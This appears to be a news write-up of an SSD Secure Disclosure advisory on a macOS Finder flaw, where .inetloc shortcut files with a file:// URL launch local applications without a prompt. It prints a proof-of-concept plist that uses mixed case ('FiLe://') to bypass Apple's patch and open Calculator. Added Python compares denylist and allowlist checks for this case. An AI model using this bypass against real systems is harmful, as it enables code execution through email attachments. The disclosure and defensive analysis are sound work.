macOS Finder allows remote attackers to execute arbitrary commands by tricking users to run
SSD Secure Disclosure has announced a new vulnerability in macOS Finder that allows remote attackers to execute arbitrary commands by tricking users into clicking maliciously crafted inetloc files embedded in emails. Once clicked, the commands embedded in the inetloc file execute without any prompt or warning to the user.
inetloc files are shortcuts to an Internet location. They contain the server address and possibly the credentials for SSH or telnet connections. They are created by typing a URL in a text editor and dragging the URL text to the Desktop.
The vulnerability stems from Finder allowing an inetloc file to refer to locally stored files as well as to remote Internet addresses. Instead of pointing at a remote address, a crafted inetloc file can use the file:// scheme to reference a local file or application, and Finder opens it when the shortcut is clicked. If such an inetloc file is attached to an email, clicking the attachment runs the maliciously crafted commands without any notice to the user.
The macOS Finder arbitrary command execution vulnerability originally affected macOS Big Sur and earlier versions. However, SSD Secure Disclosure reports that Apple patched the vulnerability silently, without assigning a CVE identifier to it.
SSD Secure Disclosure also notes that the current patch only blocks the literal file:// prefix, so it can be bypassed by changing the letter case of the scheme (for example FiLe://), because URL schemes are matched case-insensitively while the patch compares an exact string.
An example exploit that bypasses the current patch and launches Calculator.app from the local file system is given below:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
        <key>URL</key>
        <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
    </dict>
    </plist>
Note that, as a general security practice, access decisions should be based on an explicit allowlist of what is permitted rather than a denylist of what is excluded, as the fail-safe defaults principle advises. A check that rejects only the exact string file:// is a denylist, and the case-variant bypass above is exactly the kind of failure that an allowlist of parsed, normalised schemes would prevent when designing secure systems.
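As an added example, not code from the advisory or from Apple, the following Python models the two policies side by side. It parses inetloc plists with the standard plistlib module (the proof-of-concept above is embedded as constructed input), applies a denylist check that mirrors the patch as the advisory describes it (reject only the literal file:// prefix), and an allowlist check that parses the URL, lower-cases the scheme and permits only an assumed set of remote schemes. The allowed-scheme set, the function names and the sample URLs are assumptions made for illustration; nothing here opens or executes the referenced file.

```python
import plistlib
from urllib.parse import urlsplit

# The proof-of-concept plist from the advisory, embedded here as constructed
# test input (no file is read from disk).
POC_INETLOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
</dict>
</plist>
"""

# Assumed allowlist of schemes an Internet-location shortcut may carry.
# This is an illustrative choice for the example, not Apple's policy.
ALLOWED_SCHEMES = frozenset({"http", "https", "ssh", "telnet"})


def make_inetloc(url: str) -> bytes:
    """Serialise a URL into the plist layout an inetloc file uses (a dict with a URL key)."""
    return plistlib.dumps({"URL": url}, fmt=plistlib.FMT_XML)


def read_inetloc(data: bytes) -> str:
    """Extract the URL string from an inetloc plist."""
    return plistlib.loads(data)["URL"]


def denylist_allows(url: str) -> bool:
    """Model of the patch as the advisory describes it: reject only the literal,
    lower-case 'file://' prefix. Returns True when the URL would be opened."""
    return not url.startswith("file://")


def allowlist_allows(url: str) -> bool:
    """Fail-safe alternative: parse the URL, normalise the scheme to lower case
    (schemes are case-insensitive per RFC 3986) and permit only listed remote
    schemes. Every spelling of file:, an unknown scheme, or no scheme at all
    is rejected because it is simply absent from the allowlist."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return scheme in ALLOWED_SCHEMES


def triage(data: bytes) -> dict:
    """Run both checks over one inetloc payload and report the decisions."""
    url = read_inetloc(data)
    return {
        "url": url,
        "denylist_allows": denylist_allows(url),
        "allowlist_allows": allowlist_allows(url),
    }


if __name__ == "__main__":
    # Constructed samples: two legitimate remote shortcuts and three local variants.
    samples = [
        POC_INETLOC,
        make_inetloc("https://example.com/"),
        make_inetloc("ssh://user@example.com"),
        make_inetloc("file:///System/Applications/Calculator.app"),
        make_inetloc("FILE:///System/Applications/Calculator.app"),
    ]
    for sample in samples:
        print(triage(sample))
```

Running it shows the mixed-case FiLe: URL from the proof of concept passing the denylist check but failing the allowlist check, which is the bypass the advisory describes; the plain file:// spelling is caught by both, and the upper-case FILE:// spelling is again caught only by the allowlist. The difference is that the allowlist decides on the parsed and normalised scheme, so any future spelling or encoding trick against a string prefix has nothing to bypass.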
By tricking users into clicking maliciously crafted inetloc file attachments, an attacker could remotely execute arbitrary code and potentially gain full control of the system.
Category: Arbitrary Command Execution
CVSS 3.1 Base Score: N/A
CVSS 3.1 Vector: N/A
The current patch against this vulnerability can be bypassed by changing the letter case of the file:// scheme. To defend against attacks exploiting this vulnerability, users should watch for further Apple updates that remediate the flaw.
Because a successful attack requires the adversary to convince the user to open a malicious attachment through social engineering, users should also be alert to phishing attempts and treat unsolicited inetloc attachments as suspicious.
"With efficiency, you focus on making the entire program faster. If there is one or two outlier cases, you typically don’t worry about them. But with security, it’s exactly the opposite. You secure the average but the outliers are really the ones you worry about. Because those are the ones that attackers look for." - Matt Bishop
References to Advisories, Solutions and Tools
- SSD Advisory – macOS Finder RCE